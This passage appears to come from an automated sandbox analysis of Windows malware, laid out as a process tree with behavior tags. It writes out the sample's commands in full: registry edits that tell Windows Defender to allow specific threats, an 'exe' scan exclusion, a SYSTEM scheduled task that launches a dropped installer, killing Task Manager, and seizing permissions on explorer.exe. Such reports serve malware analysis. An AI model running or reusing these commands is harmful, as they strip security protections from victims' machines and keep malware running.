                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                            9⤵
                                                              PID:5468
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                10⤵
                                                                  PID:4336
                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    11⤵
                                                                      PID:5684
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                  9⤵
                                                                    PID:5524
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                      10⤵
                                                                        PID:3876
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                    8⤵
                                                                      PID:6004
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                        9⤵
                                                                          PID:4520
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                            10⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4280
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 10:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS5C54.tmp\Install.exe\" it /KlkdidkaIm 385118 /S" /V1 /F
                                                                        8⤵
                                                                        • Drops file in Windows directory
                                                                        • Creates scheduled task(s)
                                                                        PID:5736
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                        8⤵
                                                                          PID:5384
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                            9⤵
                                                                              PID:5672
                                                                              • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                10⤵
                                                                                  PID:2796
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im taskmgr.exe
                                                                    3⤵
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5648
                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\ac3.exe
                                                                    ac3.exe
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:6024
                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                    icacls c:\Windows\explorer.exe /grant Admin:(F,M)
                                                                    3⤵
                                                                    • Modifies file permissions
                                                                    PID:4036
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /t 15
                                                                    3⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:3824
                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775\jaffa.exe
                                                                    jaffa.exe
                                                                    3⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • Drops file in System32 directory
                                                                    • Drops file in Windows directory
                                                                    • Modifies registry class
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SendNotifyMessage
                                                                    PID:2432
                                                                    • C:\Windows\SysWOW64\vuwuujhhcn.exe
                                                                      vuwuujhhcn.exe
                                                                      4⤵
                                                                      • Modifies visibility of file extensions in Explorer
                                                                      • Modifies visiblity of hidden/system files in Explorer
                                                                      • Windows security bypass
                                                                      • Disables RegEdit via registry modification
                                                                      • Executes dropped EXE
                                                                      • Windows security modification
                                                                      • Enumerates connected drives
                                                                      • Modifies WinLogon
                                                                      • Drops file in System32 directory
                                                                      • Modifies registry class
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:2372
                                                                      • C:\Windows\SysWOW64\ylksgaip.exe
                                                                        C:\Windows\system32\ylksgaip.exe
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Enumerates connected drives
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Program Files directory
                                                                        • Drops file in Windows directory
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:5752
                                                                    • C:\Windows\SysWOW64\yiztnenehlokfyx.exe
                                                                      yiztnenehlokfyx.exe
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:5476
                                                                    • C:\Windows\SysWOW64\ylksgaip.exe
                                                                      ylksgaip.exe
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Enumerates connected drives
                                                                      • Drops file in System32 directory
                                                                      • Drops file in Windows directory
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:2980
                                                                    • C:\Windows\SysWOW64\xrospnfollxii.exe
                                                                      xrospnfollxii.exe
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:5956
                                                                    • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""
                                                                      4⤵
                                                                      • Drops file in Windows directory
                                                                      • Checks processor information in registry
                                                                      • Enumerates system info in registry
                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:2180
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /t 15
                                                                    3⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:1724
                                                                • C:\Users\Admin\AppData\Local\Temp\12138754-fee0-4f1c-b0d7-67894fac7b14\packer.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\12138754-fee0-4f1c-b0d7-67894fac7b14\packer.exe" "C:\Users\Admin\AppData\Local\Temp\12138754-fee0-4f1c-b0d7-67894fac7b14\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\vir.exe" "main.cmd" "C:\Users\Admin\AppData\Local\Temp\vir_fe6626bb-2abf-4be4-9865-16c79797d775" "" True True False 0 -repack
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:5996
                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                1⤵
                                                                  PID:764
                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                  1⤵
                                                                    PID:2884
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3988 -ip 3988
                                                                    1⤵
                                                                      PID:3316
                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                      C:\Windows\system32\AUDIODG.EXE 0x480 0x50c
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2280
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5556 -ip 5556
                                                                      1⤵
                                                                        PID:3988
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                        1⤵
                                                                          PID:396
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                          1⤵
                                                                            PID:5404
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS5C54.tmp\Install.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\7zS5C54.tmp\Install.exe it /KlkdidkaIm 385118 /S
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Drops desktop.ini file(s)
                                                                            • Drops file in System32 directory
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:5532
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                              2⤵
                                                                                PID:5772
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  3⤵
                                                                                    PID:6052
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                    3⤵
                                                                                      PID:3000
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                        4⤵
                                                                                          PID:636
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                            5⤵
                                                                                              PID:3588
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                          3⤵
                                                                                            PID:772
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                              4⤵
                                                                                                PID:900
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                  5⤵
                                                                                                    PID:3784
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                3⤵
                                                                                                  PID:3140
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                    4⤵
                                                                                                      PID:3144
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                        5⤵
                                                                                                          PID:528
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                      3⤵
                                                                                                        PID:5136
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                          4⤵
                                                                                                            PID:4260
                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                              5⤵
                                                                                                                PID:5208
                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                            3⤵
                                                                                                              PID:2588
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                4⤵
                                                                                                                  PID:3464
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                    5⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1564
                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                      6⤵
                                                                                                                        PID:5440
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                2⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1328
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:5868
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:2088
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:3880
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:2136
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:6076
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:2984
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:3308
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:4068
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:2268
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:3540
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:5556
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:4864
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:5552
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:1672
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:3924
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:5952
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5376
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3568
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5324
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4408
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2424
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5392
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5244
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4332
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5400
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6004
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4900
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4520
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
